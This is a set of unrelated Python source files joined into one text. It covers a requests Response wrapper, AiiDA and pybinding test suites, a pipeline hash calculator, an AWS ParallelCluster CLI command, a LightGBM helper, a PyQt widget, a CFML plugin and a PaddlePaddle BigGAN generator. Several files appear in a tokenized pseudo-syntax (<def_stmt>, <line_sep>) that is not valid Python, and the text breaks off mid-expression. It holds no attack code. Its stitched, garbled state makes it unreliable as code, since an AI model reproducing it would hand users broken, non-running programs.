# Import Third-Party
from requests import Response


class APIResponse(Response):
    def __init__(self, req_response, formatted_json=None):
        # Copy all state from the wrapped requests.Response instance.
        for k, v in req_response.__dict__.items():
            self.__dict__[k] = v
        self._formatted = formatted_json

    @property
    def formatted(self):
        return self._formatted

    @formatted.setter
    def formatted(self, value):
        self._formatted = value


if __name__ == '__main__':
    from bitex import Kraken

    k = Kraken()
    resp = k.ticker('XXBTZEUR')
    print(resp.formatted)
    print(resp.json())
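A minimal usage sketch of the wrapper above that needs only the `requests` package; the URL and the `fetch_formatted` helper are invented for illustration and are not part of the original module.

import requests


def fetch_formatted(url):
    """Wrap a plain requests.Response and attach a pre-formatted JSON payload (illustrative only)."""
    raw = requests.get(url)
    # APIResponse copies the original response's state and stores the formatted payload alongside it.
    return APIResponse(raw, formatted_json=raw.json() if raw.ok else None)


# Example (hypothetical endpoint):
# resp = fetch_formatted('https://api.example.com/ticker')
# print(resp.status_code, resp.formatted)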
from motrackers.detectors.tf import TF_SSDMobileNetV2
from motrackers.detectors.caffe import Caffe_SSDMobileNet
from motrackers.detectors.yolo import YOLOv3
# -*- coding: utf-8 -*- ########################################################################### # Copyright (c), The AiiDA team. All rights reserved. # # This file is part of the AiiDA code. # # # # The code is hosted on GitHub at https://github.com/aiidateam/aiida-core # # For further information on the license, see the LICENSE.txt file # # For further information please visit http://www.aiida.net # ########################################################################### # pylint: disable=redefined-outer-name """Tests for the :mod:`aiida.orm.nodes.data.array.bands` module."""<import_from_stmt>argparse Namespace<import_stmt>pytest<import_from_stmt>aiida.common.exceptions NotExistent<import_from_stmt>aiida.orm BandsData Group User<import_from_stmt>aiida.orm.nodes.data.array.bands get_bands_and_parents_structure<line_sep>@pytest.fixture<def_stmt>alternate_user <block_start>"""Return an alternate ``User`` instance that is not the current default user."""<line_sep>email='alternate<EMAIL>'<try_stmt><block_start><return>User.objects.get(email=email)<block_end><except_stmt>NotExistent<block_start><return>User(email='alternate<EMAIL>').store()<block_end><block_end><class_stmt>TestGetBandsAndParentsStructure<block_start>"""Tests for the :meth:`~aiida.orm.nodes.data.array.bands.get_bands_and_parents_structure` function."""<line_sep>@staticmethod<def_stmt>_get_default_ns <block_start>"""Returns a simple template Namespace"""<line_sep>args=Namespace()<line_sep>args.element=<none><line_sep>args.element_only=<none><line_sep>args.formulamode=<none><line_sep>args.past_days=<none><line_sep>args.group_name=<none><line_sep>args.group_pk=<none><line_sep>args.all_users=<false><line_sep><return>args<block_end>@pytest.mark.parametrize('all_users, expected' ((<true> [<true> <true>]) (<false> [<true> <false>])))@pytest.mark.usefixtures('clear_database_before_test')<def_stmt>test_all_users self alternate_user all_users expected<block_start>"""Test the behavior for the ``all_users`` argument."""<line_sep>bands_default_user=BandsData().store()<line_sep>bands_alternate_user=BandsData(user=alternate_user).store()<line_sep>bands=[bands_default_user bands_alternate_user]<line_sep>args=self._get_default_ns()<line_sep>args.all_users=all_users<line_sep>entries=get_bands_and_parents_structure(args)<line_sep>node_pks=[int(e[0])<for>e entries]<assert_stmt>[node.pk<in>node_pks<for>node bands]<eq>expected<block_end>@pytest.mark.parametrize('argument, attribute' (('group_name' 'label') ('group_pk' 'pk')))@pytest.mark.usefixtures('clear_database_before_test')<def_stmt>test_identifier self argument attribute<block_start>"""Test the behavior for the ``group_name`` and ``group_pk`` arguments."""<line_sep>bands_data_grouped=BandsData().store()<line_sep>_=BandsData().store()<line_sep>bands_group=Group('some_bands_data').store()<line_sep>bands_group.add_nodes(bands_data_grouped)<line_sep>args=self._get_default_ns()<line_sep>setattr(args argument [getattr(bands_group attribute)])<line_sep>entries=get_bands_and_parents_structure(args)<assert_stmt>[int(e[0])<for>e entries]<eq>[bands_data_grouped.pk]<block_end><block_end>
import hashlib

from ...utilities.extended_json import json
from ..parsers.base_parser import PipelineSpec
from ..errors import SpecError
from .dependency_resolver import resolve_dependencies


class HashCalculator(object):

    def __init__(self):
        self.all_pipeline_ids = {}

    def calculate_hash(self, spec: PipelineSpec, status_mgr, ignore_missing_deps=False):
        cache_hash = None
        if spec.pipeline_id in self.all_pipeline_ids:
            message = 'Duplicate key {0} in {1}'.format(spec.pipeline_id, spec.path)
            spec.validation_errors.append(SpecError('Duplicate Pipeline Id', message))
        else:
            if ignore_missing_deps:
                cache_hash = ''
            else:
                cache_hash = resolve_dependencies(spec, self.all_pipeline_ids, status_mgr)
            self.all_pipeline_ids[spec.pipeline_id] = spec
            if len(spec.validation_errors) > 0:
                return cache_hash

            for step in spec.pipeline_details['pipeline']:
                m = hashlib.md5()
                m.update(cache_hash.encode('ascii'))
                with open(step['executor'], 'rb') as f:
                    m.update(f.read())
                m.update(json.dumps(step, ensure_ascii=True, sort_keys=True).encode('ascii'))
                cache_hash = m.hexdigest()
                step['_cache_hash'] = cache_hash

        spec.cache_hash = cache_hash
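To make the chained-hash scheme above concrete, here is a minimal sketch of the same idea using plain dictionaries in place of PipelineSpec steps; it omits the executor-file read, and the function and step names are invented for illustration.

import hashlib
import json


def chain_step_hashes(steps, seed=''):
    """Hash each step's serialized definition together with the hash of everything before it."""
    cache_hash = seed
    for step in steps:
        m = hashlib.md5()
        m.update(cache_hash.encode('ascii'))
        m.update(json.dumps(step, ensure_ascii=True, sort_keys=True).encode('ascii'))
        cache_hash = m.hexdigest()
        step['_cache_hash'] = cache_hash
    return cache_hash


# Changing any earlier step changes every hash after it:
steps = [{'run': 'load'}, {'run': 'clean'}, {'run': 'dump'}]
print(chain_step_hashes(steps))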
# Copyright 2013-2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the 'License'). You may not use this file except in compliance
# with the License. A copy of the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the 'LICENSE.txt' file accompanying this file. This file is distributed on an 'AS IS' BASIS, WITHOUT WARRANTIES
# OR CONDITIONS OF ANY KIND, express or implied. See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=import-outside-toplevel
from typing import List

import argparse
from argparse import Namespace

from pcluster.cli.commands.common import CliCommand


class ConfigureCommand(CliCommand):
    """Implement pcluster configure command."""

    # CLI
    name = "configure"
    help = "Start the AWS ParallelCluster configuration."
    description = help

    def __init__(self, subparsers):
        super().__init__(subparsers, name=self.name, help=self.help, description=self.description)

    def register_command_args(self, parser: argparse.ArgumentParser) -> None:  # noqa: D102
        parser.add_argument("-c", "--config", help="Path to output the generated config file.", required=True)

    def execute(self, args: Namespace, extra_args: List[str]) -> None:  # noqa: D102  # pylint: disable=unused-argument
        from pcluster.cli.commands.configure.easyconfig import configure

        configure(args)
from typing import List

import pandas as pd
from lightgbm import Booster


def make_imp_df(boosters: List[Booster]) -> pd.DataFrame:
    df = pd.concat([pd.DataFrame({'name': b.feature_name(), 'importance': b.feature_importance()})
                    for b in boosters])
    return (df.groupby('name')
              .mean()
              .sort_values('importance')
              .reset_index(level='name')
              .set_index('name'))
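A hedged usage sketch for the helper above; the training data is synthetic and the LightGBM parameters are arbitrary placeholders.

import numpy as np
import lightgbm as lgb

# Train two small boosters on random data just to produce feature importances.
rng = np.random.default_rng(0)
X = rng.normal(size=(200, 5))
y = (X[:, 0] + rng.normal(scale=0.1, size=200) > 0).astype(int)

boosters = [
    lgb.train({'objective': 'binary', 'verbose': -1}, lgb.Dataset(X, label=y), num_boost_round=20)
    for _ in range(2)
]

# Average importance per feature name across the boosters, sorted ascending.
print(make_imp_df(boosters))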
from PyQt5 import QtCore
import pandas as pd

from DyCommon.Ui.DyStatsTableWidget import *


class DyStatsDataFrameTableWidget(DyStatsTableWidget):
    """Only the DataFrame's columns are shown; the index must be converted to a column by the caller."""

    def __init__(self, df, parent=None):
        super().__init__(parent=parent, readOnly=True, index=False, floatCut=True, autoScroll=False)
        self._initDf(df)

    def _initDf(self, df):
        self.setColNames(list(df.columns))
        self.fastAppendRows(df.values.tolist())
<import_stmt>pytest<import_stmt>numpy<as>np<import_stmt>pybinding<as>pb<import_from_stmt>pybinding.repository graphene group6_tmd<line_sep>models={'graphene-pristine':[graphene.monolayer() pb.rectangle(15)] 'graphene-pristine-oversized':[graphene.monolayer() pb.rectangle(20)] 'graphene-const_potential':[graphene.monolayer() pb.rectangle(15) pb.constant_potential(0.5)] 'graphene-magnetic_field':[graphene.monolayer() pb.rectangle(15) graphene.constant_magnetic_field(1e3)] }<line_sep>@pytest.fixture(scope='module' ids=list(models.keys()) params=models.values())<def_stmt>model request<block_start><return>pb.Model(*request.param)<block_end>ldos_models={**models "mos2":[group6_tmd.monolayer_3band("MoS2") pb.rectangle(6)]}<line_sep>@pytest.mark.parametrize("params" ldos_models.values() ids=list(ldos_models.keys()))<def_stmt>test_ldos params baseline plot_if_fails<block_start>configurations=[{'matrix_format':"CSR" 'optimal_size':<false> 'interleaved':<false>} {'matrix_format':"CSR" 'optimal_size':<true> 'interleaved':<false>} {'matrix_format':"CSR" 'optimal_size':<false> 'interleaved':<true>} {'matrix_format':"ELL" 'optimal_size':<true> 'interleaved':<true>} ]<line_sep>model=pb.Model(*params)<line_sep>kernel=pb.lorentz_kernel()<line_sep>strategies=[pb.kpm(model kernel=kernel silent=<true> **c)<for>c configurations]<line_sep>energy=np.linspace(0 2 25)<line_sep>results=[kpm.calc_ldos(energy broadening=0.15 position=[0 0.07] reduce=<false>)<for>kpm strategies]<line_sep>expected=results[0].with_data(baseline(results[0].data.astype(np.float32)))<for_stmt>i range(len(results))<block_start>plot_if_fails(results[i] expected 'plot' label=i)<block_end><for_stmt>result results<block_start><assert_stmt>pytest.fuzzy_equal(result expected rtol=1e-3 atol=1e-6)<block_end><block_end><def_stmt>test_moments model plot_if_fails<block_start>energy=np.linspace(0 2 25)<line_sep>broadening=0.15<line_sep>position=dict(position=[0 0] sublattice="A")<line_sep>kpm=pb.kpm(model silent=<true>)<line_sep>expected_ldos=kpm.calc_ldos(energy broadening **position)<def_stmt>manual_ldos <block_start>idx=model.system.find_nearest(**position)<line_sep>alpha=np.zeros(model.hamiltonian.shape[0])<line_sep>alpha[idx]=1<line_sep>a,b=kpm.scaling_factors<line_sep>num_moments=kpm.kernel.required_num_moments(broadening/a)<line_sep>moments=kpm.moments(num_moments alpha)<line_sep>ns=np.arange(num_moments)<line_sep>scaled_energy=(energy-b)/a<line_sep>k=2/(a<times>np.pi<times>np.sqrt(1-scaled_energy<power>2))<line_sep>chebyshev=np.cos(ns<times>np.arccos(scaled_energy[: np.newaxis]))<line_sep><return>k<times>np.sum(moments.real<times>chebyshev axis=1)<block_end>ldos=expected_ldos.with_data(manual_ldos())<line_sep>plot_if_fails(ldos expected_ldos "plot")<assert_stmt>pytest.fuzzy_equal(ldos expected_ldos rtol=1e-4 atol=1e-6)<with_stmt>pytest.raises(RuntimeError)<as>excinfo<block_start>kpm.moments(10 [1 2 3])<block_end><assert_stmt>"Size mismatch"<in>str(excinfo.value)<with_stmt>pytest.raises(RuntimeError)<as>excinfo<block_start>kpm=pb.kpm(pb.Model(graphene.monolayer()))<line_sep>kpm.moments(10 [1j 2j])<block_end><assert_stmt>"Hamiltonian is real, but the given argument 'alpha' is complex"<in>str(excinfo.value)<block_end><def_stmt>test_kpm_multiple_indices model<block_start>"""KPM can take a vector of column indices and return the Green's function for all of them"""<line_sep>kpm=pb.kpm(model silent=<true>)<line_sep>num_sites=model.system.num_sites<line_sep>i,j=num_sites<floordiv>2 num_sites<floordiv>4<line_sep>energy=np.linspace(-0.3 0.3 
10)<line_sep>broadening=0.8<line_sep>cols=[j j+1 j+2]<line_sep>gs=kpm.calc_greens(i cols energy broadening)<assert_stmt>len(gs)<eq>len(cols)<line_sep>g=kpm.calc_greens(j i energy broadening)<assert_stmt>pytest.fuzzy_equal(gs[0] g)<block_end><def_stmt>test_kpm_reuse <block_start>"""KPM should return the same result when a single object is used for multiple calculations"""<line_sep>model=pb.Model(graphene.monolayer() graphene.hexagon_ac(10))<line_sep>kpm=pb.kpm(model silent=<true>)<line_sep>energy=np.linspace(-5 5 50)<line_sep>broadening=0.1<for_stmt>position [0 0] [6 0]<block_start>actual=kpm.calc_ldos(energy broadening position)<line_sep>expected=pb.kpm(model).calc_ldos(energy broadening position)<assert_stmt>pytest.fuzzy_equal(actual expected rtol=1e-3 atol=1e-6)<block_end><block_end><def_stmt>test_ldos_sublattice <block_start>"""LDOS for A and B sublattices should be antisymmetric for graphene with a mass term"""<line_sep>model=pb.Model(graphene.monolayer() graphene.hexagon_ac(10) graphene.mass_term(1))<line_sep>kpm=pb.kpm(model silent=<true>)<line_sep>a,b=(kpm.calc_ldos(np.linspace(-5 5 50) 0.1 [0 0] sub)<for>sub ('A' 'B'))<assert_stmt>pytest.fuzzy_equal(a.data b.data[::-1] rtol=1e-3 atol=1e-6)<block_end><def_stmt>test_optimized_hamiltonian <block_start>"""Currently available only in internal interface"""<import_from_stmt>pybinding _cpp<line_sep>model=pb.Model(graphene.monolayer() graphene.hexagon_ac(10))<line_sep>h=model.hamiltonian<line_sep>oh=_cpp.OptimizedHamiltonian(model.raw_hamiltonian 0)<assert_stmt>oh.matrix.shape<eq>h.shape<assert_stmt>oh.sizes[-1]<eq>h.shape[0]<assert_stmt>len(oh.indices)<eq>h.shape[0]<block_end>dos_models={'graphene-const_potential':[graphene.monolayer() pb.rectangle(25) pb.constant_potential(0.5)] 'graphene-magnetic_field':[graphene.monolayer() pb.rectangle(25) graphene.constant_magnetic_field(1e3)] }<line_sep>@pytest.mark.parametrize("params" dos_models.values() ids=list(dos_models.keys()))<def_stmt>test_dos params baseline plot_if_fails<block_start>configurations=[{'matrix_format':"ELL" 'optimal_size':<false> 'interleaved':<false>} {'matrix_format':"ELL" 'optimal_size':<true> 'interleaved':<true>} ]<line_sep>model=pb.Model(*params)<line_sep>kernel=pb.lorentz_kernel()<line_sep>strategies=[pb.kpm(model kernel=kernel silent=<true> **c)<for>c configurations]<line_sep>energy=np.linspace(0 2 25)<line_sep>results=[kpm.calc_dos(energy broadening=0.15)<for>kpm strategies]<line_sep>expected=results[0].with_data(baseline(results[0].data.astype(np.float32)))<for_stmt>i range(len(results))<block_start>plot_if_fails(results[i] expected 'plot' label=i)<block_end><for_stmt>result results<block_start><assert_stmt>pytest.fuzzy_equal(result expected rtol=1e-3 atol=1e-6)<block_end><block_end>cond_models={'graphene-const_potential':[graphene.monolayer() pb.rectangle(20) pb.constant_potential(0.5)] 'graphene-magnetic_field':[graphene.monolayer() pb.rectangle(20) graphene.constant_magnetic_field(1e3)]}<line_sep>@pytest.mark.parametrize("params" cond_models.values() ids=list(cond_models.keys()))<def_stmt>test_conductivity params baseline plot_if_fails<block_start>configurations=[{'matrix_format':"ELL" 'optimal_size':<false> 'interleaved':<false>} {'matrix_format':"ELL" 'optimal_size':<true> 'interleaved':<true>} ]<line_sep>model=pb.Model(*params)<line_sep>kernel=pb.lorentz_kernel()<line_sep>strategies=[pb.kpm(model energy_range=[-9 9] kernel=kernel silent=<true> **c)<for>c configurations]<line_sep>energy=np.linspace(-2 2 25)<line_sep>results=[kpm.calc_conductivity(energy 
broadening=0.5 temperature=0 num_points=200)<for>kpm strategies]<line_sep>expected=results[0].with_data(baseline(results[0].data.astype(np.float32)))<for_stmt>i range(len(results))<block_start>plot_if_fails(results[i] expected "plot" label=i)<block_end><for_stmt>result results<block_start><assert_stmt>pytest.fuzzy_equal(result expected rtol=1e-2 atol=1e-5)<block_end><block_end>
from .. import plugin
from .cfdocs import (
    get_inline_documentation,
    get_completion_docs,
    get_goto_cfml_file,
)


class CFMLPlugin(plugin.CFMLPlugin):

    def get_completion_docs(self, cfml_view):
        return get_completion_docs(cfml_view)

    def get_inline_documentation(self, cfml_view, doc_type):
        return get_inline_documentation(cfml_view, doc_type)

    def get_goto_cfml_file(self, cfml_view):
        return get_goto_cfml_file(cfml_view)
<import_stmt>numpy<as>np<import_stmt>paddle.fluid<as>fluid<import_from_stmt>paddle.fluid layers dygraph<as>dg<import_from_stmt>paddle.fluid.initializer Normal Constant Uniform<class_stmt>ModelCache(object)<block_start>G=<none><line_sep>D=<none><line_sep>train_mode=<false><line_sep>initialized=<false><block_end>model_cache=ModelCache<def_stmt>unpool value<block_start>"""Unpooling operation. N-dimensional version of the unpooling operation from https://www.robots.ox.ac.uk/~vgg/rg/papers/Dosovitskiy_Learning_to_Generate_2015_CVPR_paper.pdf Taken from: https://github.com/tensorflow/tensorflow/issues/2169 Args: value: a Tensor of shape [b, d0, d1, ..., dn, ch] name: name of the op Returns: A Tensor of shape [b, 2*d0, 2*d1, ..., 2*dn, ch] """<line_sep>value=layers.transpose(value [0 2 3 1])<line_sep>sh=value.shape<line_sep>dim=len(sh[1:-1])<line_sep>out=(layers.reshape(value [-1]+sh[-dim:]))<for_stmt>i range(dim 0 -1)<block_start>out=layers.concat([out layers.zeros_like(out)] i)<block_end>out_size=[-1]+[s<times>2<for>s sh[1:-1]]+[sh[-1]]<line_sep>out=layers.reshape(out out_size)<line_sep>out=layers.transpose(out [0 3 1 2])<line_sep><return>out<block_end><class_stmt>ReLU(dg.Layer)<block_start><def_stmt>forward self x<block_start><return>layers.relu(x)<block_end><block_end><class_stmt>SoftMax(dg.Layer)<block_start><def_stmt>__init__ self **kwargs<block_start>super().__init__()<line_sep>self.kwargs=kwargs<block_end><def_stmt>forward self x<block_start><return>layers.softmax(x **self.kwargs)<block_end><block_end><class_stmt>BatchNorm(dg.BatchNorm)# not trainable <block_start><def_stmt>__init__ self *args **kwargs<block_start><if_stmt>'affine'<in>kwargs<block_start>affine=kwargs.pop('affine')<block_end><else_stmt><block_start>affine=<true><block_end>super().__init__(*args **kwargs)<line_sep>self._use_global_stats=<true><if_stmt><not>affine<block_start>weight=(self.weight<times>0+1).detach()<line_sep>bias=(self.bias<times>0).detach()<del_stmt>self._parameters['bias']<del_stmt>self._parameters['weight']<line_sep>self.weight=weight<line_sep>self.bias=bias<block_end>self.weight.stop_gradient=<true><line_sep>self.bias.stop_gradient=<true><line_sep>self.accumulated_mean=self.create_parameter(shape=[args[0]] default_initializer=Constant(0.0))<line_sep>self.accumulated_var=self.create_parameter(shape=[args[0]] default_initializer=Constant(0.0))<line_sep>self.accumulated_counter=self.create_parameter(shape=[1] default_initializer=Constant(1e-12))<line_sep>self.accumulated_mean.stop_gradient=<true><line_sep>self.accumulated_var.stop_gradient=<true><line_sep>self.accumulated_counter.stop_gradient=<true><block_end><def_stmt>forward self inputs *args **kwargs<block_start><if_stmt>'_mean'<in>self._parameters<block_start><del_stmt>self._parameters['_mean']<block_end><if_stmt>'_variance'<in>self._parameters<block_start><del_stmt>self._parameters['_variance']<block_end><if_stmt><not>model_cache.initialized<and><not>model_cache.train_mode<block_start>self._mean=(self.accumulated_mean/self.accumulated_counter)<line_sep>self._variance=(self.accumulated_var/self.accumulated_counter)<block_end><if_stmt>model_cache.train_mode<block_start>axes=[0]+([]<if>len(inputs.shape)<eq>2<else>list(range(2 len(inputs.shape))))<line_sep>_mean=layers.reduce_mean(inputs axes keep_dim=<true>)<line_sep>self._mean=layers.reduce_mean(inputs axes keep_dim=<false>)<line_sep>self._variance=layers.reduce_mean((inputs-_mean)<power>2 
axes)<block_end><else_stmt><block_start>self._mean=self._mean.detach()<line_sep>self._variance=self._variance.detach()<block_end><return>super().forward(inputs *args **kwargs)<block_end><block_end><class_stmt>SpectralNorm(dg.Layer)# not trainable <block_start><def_stmt>__init__ self module name='weight' power_iterations=2<block_start>super().__init__()<line_sep>self.module=module<line_sep>self.name=name<line_sep>self.power_iterations=power_iterations<line_sep>self.initialized=<false><if_stmt><not>self._made_params()<block_start>self._make_params()<block_end><block_end><def_stmt>_update_u self<block_start>w=self.weight<line_sep>u=self.weight_u<if_stmt>len(w.shape)<eq>4<block_start>_w=layers.transpose(w [2 3 1 0])<line_sep>_w=layers.reshape(_w [-1 _w.shape[-1]])<block_end><else_stmt><block_start>_w=layers.reshape(w [-1 w.shape[-1]])<line_sep>_w=layers.reshape(_w [-1 _w.shape[-1]])<block_end>singular_value="left"<if>_w.shape[0]<le>_w.shape[1]<else>"right"<line_sep>norm_dim=0<if>_w.shape[0]<le>_w.shape[1]<else>1<for_stmt>_ range(self.power_iterations)<block_start><if_stmt>singular_value<eq>"left"<block_start>v=layers.l2_normalize(layers.matmul(_w u transpose_x=<true>) axis=norm_dim)<line_sep>u=layers.l2_normalize(layers.matmul(_w v) axis=norm_dim)<block_end><else_stmt><block_start>v=layers.l2_normalize(layers.matmul(u _w transpose_y=<true>) axis=norm_dim)<line_sep>u=layers.l2_normalize(layers.matmul(v _w) axis=norm_dim)<block_end><block_end><if_stmt>singular_value<eq>"left"<block_start>sigma=layers.matmul(layers.matmul(u _w transpose_x=<true>) v)<block_end><else_stmt><block_start>sigma=layers.matmul(layers.matmul(v _w) u transpose_y=<true>)<block_end>_w=w/sigma.detach()<line_sep>setattr(self.module self.name _w.detach())<block_end># setattr(self.module, self.name, _w) # self.weight_u.set_value(u) <def_stmt>_made_params self<block_start><try_stmt><block_start>self.weight<line_sep>self.weight_u<line_sep><return><true><block_end><except_stmt>AttributeError<block_start><return><false><block_end><block_end><def_stmt>_make_params self# paddle linear weight is similar with tf's, and conv weight is similar with pytorch's. 
<block_start>w=getattr(self.module self.name)<if_stmt>len(w.shape)<eq>4<block_start>_w=layers.transpose(w [2 3 1 0])<line_sep>_w=layers.reshape(_w [-1 _w.shape[-1]])<block_end><else_stmt><block_start>_w=layers.reshape(w [-1 w.shape[-1]])<block_end>singular_value="left"<if>_w.shape[0]<le>_w.shape[1]<else>"right"<line_sep>norm_dim=0<if>_w.shape[0]<le>_w.shape[1]<else>1<line_sep>u_shape=(_w.shape[0] 1)<if>singular_value<eq>"left"<else>(1 _w.shape[-1])<line_sep>u=self.create_parameter(shape=u_shape default_initializer=Normal(0 1))<line_sep>u.stop_gradient=<true><line_sep>u.set_value(layers.l2_normalize(u axis=norm_dim))<del_stmt>self.module._parameters[self.name]<line_sep>self.add_parameter("weight" w)<line_sep>self.add_parameter("weight_u" u)<block_end><def_stmt>forward self *args **kwargs<block_start><if_stmt><not>self.initialized<block_start>self._update_u()<line_sep>self.initialized=<true><block_end><return>self.module.forward(*args **kwargs)<block_end><block_end><class_stmt>SelfAttention(dg.Layer)<block_start><def_stmt>__init__ self in_dim activation=layers.relu<block_start>super().__init__()<line_sep>self.chanel_in=in_dim<line_sep>self.activation=activation<line_sep>self.theta=SpectralNorm(dg.Conv2D(in_dim in_dim<floordiv>8 1 bias_attr=<false>))<line_sep>self.phi=SpectralNorm(dg.Conv2D(in_dim in_dim<floordiv>8 1 bias_attr=<false>))<line_sep>self.pool=dg.Pool2D(2 'max' 2)<line_sep>self.g=SpectralNorm(dg.Conv2D(in_dim in_dim<floordiv>2 1 bias_attr=<false>))<line_sep>self.o_conv=SpectralNorm(dg.Conv2D(in_dim<floordiv>2 in_dim 1 bias_attr=<false>))<line_sep>self.gamma=self.create_parameter([1 ] default_initializer=Constant(0.0))<line_sep>self.softmax=SoftMax(axis=-1)<block_end><def_stmt>forward self x<block_start>m_batchsize,C,width,height=x.shape<line_sep>N=height<times>width<line_sep>theta=self.theta(x)<line_sep>phi=self.phi(x)<line_sep>phi=self.pool(phi)<line_sep>phi=layers.reshape(phi (m_batchsize -1 N<floordiv>4))<line_sep>theta=layers.reshape(theta (m_batchsize -1 N))<line_sep>theta=layers.transpose(theta (0 2 1))<line_sep>attention=self.softmax(layers.bmm(theta phi))<line_sep>g=self.g(x)<line_sep>g=layers.reshape(self.pool(g) (m_batchsize -1 N<floordiv>4))<line_sep>attn_g=layers.reshape(layers.bmm(g layers.transpose(attention (0 2 1))) (m_batchsize -1 width height))<line_sep>out=self.o_conv(attn_g)<line_sep><return>self.gamma<times>out+x<block_end><block_end><class_stmt>ConditionalBatchNorm(dg.Layer)<block_start><def_stmt>__init__ self num_features num_classes epsilon=1e-5 momentum=0.1<block_start>super().__init__()<line_sep>self.bn_in_cond=BatchNorm(num_features affine=<false> epsilon=epsilon momentum=momentum)<line_sep>self.gamma_embed=SpectralNorm(dg.Linear(num_classes num_features bias_attr=<false>))<line_sep>self.beta_embed=SpectralNorm(dg.Linear(num_classes num_features bias_attr=<false>))<block_end><def_stmt>forward self x y<block_start>out=self.bn_in_cond(x)<if_stmt>isinstance(y list)<block_start>gamma,beta=y<line_sep>out=layers.reshape(gamma (0 0 1 1))<times>out+layers.reshape(beta (0 0 1 1))<line_sep><return>out<block_end>gamma=self.gamma_embed(y)<line_sep>beta=self.beta_embed(y)<line_sep>out=layers.reshape(gamma (0 0 1 1))<times>out+layers.reshape(beta (0 0 1 1))<line_sep><return>out<block_end><block_end><class_stmt>ResBlock(dg.Layer)<block_start><def_stmt>__init__ self in_channel out_channel kernel_size=[3 3] padding=1 stride=1 n_class=<none> conditional=<true> activation=layers.relu upsample=<true> downsample=<false> z_dim=128 use_attention=<false> 
skip_proj=<none><block_start>super().__init__()<if_stmt>conditional<block_start>self.cond_norm1=ConditionalBatchNorm(in_channel z_dim)<block_end>self.conv0=SpectralNorm(dg.Conv2D(in_channel out_channel kernel_size stride padding))<if_stmt>conditional<block_start>self.cond_norm2=ConditionalBatchNorm(out_channel z_dim)<block_end>self.conv1=SpectralNorm(dg.Conv2D(out_channel out_channel kernel_size stride padding))<line_sep>self.skip_proj=<false><if_stmt>skip_proj<is><not><true><and>(upsample<or>downsample)<block_start>self.conv_sc=SpectralNorm(dg.Conv2D(in_channel out_channel 1 1 0))<line_sep>self.skip_proj=<true><block_end><if_stmt>use_attention<block_start>self.attention=SelfAttention(out_channel)<block_end>self.upsample=upsample<line_sep>self.downsample=downsample<line_sep>self.activation=activation<line_sep>self.conditional=conditional<line_sep>self.use_attention=use_attention<block_end><def_stmt>forward self input condition=<none><block_start>out=input<if_stmt>self.conditional<block_start>out=self.cond_norm1(out condition[0]<if>isinstance(condition list)<else>condition)<block_end>out=self.activation(out)<if_stmt>self.upsample<block_start>out=unpool(out)<block_end>out=self.conv0(out)<if_stmt>self.conditional<block_start>out=self.cond_norm2(out condition[1]<if>isinstance(condition list)<else>condition)<block_end>out=self.activation(out)<line_sep>out=self.conv1(out)<if_stmt>self.downsample<block_start>out=layers.pool2d(out 2 pool_type='avg' pool_stride=2)<block_end><if_stmt>self.skip_proj<block_start>skip=input<if_stmt>self.upsample<block_start>skip=unpool(skip)<block_end>skip=self.conv_sc(skip)<if_stmt>self.downsample<block_start>skip=layers.pool2d(skip 2 pool_type='avg' pool_stride=2)<block_end>out=out+skip<block_end><else_stmt><block_start>skip=input<block_end><if_stmt>self.use_attention<block_start>out=self.attention(out)<block_end><return>out<block_end><block_end><class_stmt>Generator(dg.Layer)# not trainable <block_start><def_stmt>__init__ self code_dim=128 n_class=1000 chn=96 blocks_with_attention="B4" resolution=512<block_start>super().__init__()<def_stmt>GBlock in_channel out_channel n_class z_dim use_attention<block_start><return>ResBlock(in_channel out_channel n_class=n_class z_dim=z_dim use_attention=use_attention)<block_end>self.embed_y=dg.Linear(n_class 128 bias_attr=<false>)<line_sep>self.chn=chn<line_sep>self.resolution=resolution<line_sep>self.blocks_with_attention=set(blocks_with_attention.split(","))<line_sep>self.blocks_with_attention.discard('')<line_sep>gblock=[]<line_sep>in_channels,out_channels=self.get_in_out_channels()<line_sep>self.num_split=len(in_channels)+1<line_sep>z_dim=code_dim<floordiv>self.num_split+128<line_sep>self.noise_fc=SpectralNorm(dg.Linear(code_dim<floordiv>self.num_split 4<times>4<times>in_channels[0]))<line_sep>self.sa_ids=[int(s.split('B')[-1])<for>s self.blocks_with_attention]<for_stmt>i,(nc_in nc_out) enumerate(zip(in_channels out_channels))<block_start>gblock.append(GBlock(nc_in nc_out n_class=n_class z_dim=z_dim use_attention=(i+1)<in>self.sa_ids))<block_end>self.blocks=dg.LayerList(gblock)<line_sep>self.output_layer_bn=BatchNorm(1<times>chn epsilon=1e-5)<line_sep>self.output_layer_conv=SpectralNorm(dg.Conv2D(1<times>chn 3 [3 3] padding=1))<block_end><def_stmt>get_in_out_channels self<block_start>resolution=self.resolution<if_stmt>resolution<eq>1024<block_start>channel_multipliers=[16 16 8 8 4 2 1 1 1]<block_end><elif_stmt>resolution<eq>512<block_start>channel_multipliers=[16 16 8 8 4 2 1 
1]<block_end><elif_stmt>resolution<eq>256<block_start>channel_multipliers=[16 16 8 8 4 2 1]<block_end><elif_stmt>resolution<eq>128<block_start>channel_multipliers=[16 16 8 4 2 1]<block_end><elif_stmt>resolution<eq>64<block_start>channel_multipliers=[16 16 8 4 2]<block_end><elif_stmt>resolution<eq>32<block_start>channel_multipliers=[4 4 4 4]<block_end><else_stmt><block_start><raise>ValueError("Unsupported resolution: {}".format(resolution))<block_end>in_channels=[self.chn<times>c<for>c channel_multipliers[:-1]]<line_sep>out_channels=[self.chn<times>c<for>c channel_multipliers[1:]]<line_sep><return>in_channels out_channels<block_end><def_stmt>forward self input class_id input_class_emb=<false><block_start><if_stmt>isinstance(input list)<block_start>codes=[input[0]]<line_sep>codes<augadd>[input[2<times>i+1:2<times>i+3]<for>i range(len(input)<floordiv>2)]<block_end><else_stmt><block_start>codes=layers.split(input self.num_split 1)<block_end><if_stmt><not>input_class_emb<block_start>class_emb=self.embed_y(class_id)# 128 <block_end><else_stmt><block_start>class_emb=class_id<block_end>out=self.noise_fc(codes[0])<line_sep>out=layers.transpose(layers.reshape(out (out.shape[0] 4 4 -1)) (0 3 1 2))<for_stmt>i,(code gblock) enumerate(zip(codes[1:] self.blocks))<block_start><if_stmt>isinstance(input list)<block_start>condition=[layers.concat([c class_emb] 1)<for>c code]<block_end><else_stmt><block_start>condition=layers.concat([code class_emb] 1)<block_end>out=gblock(out 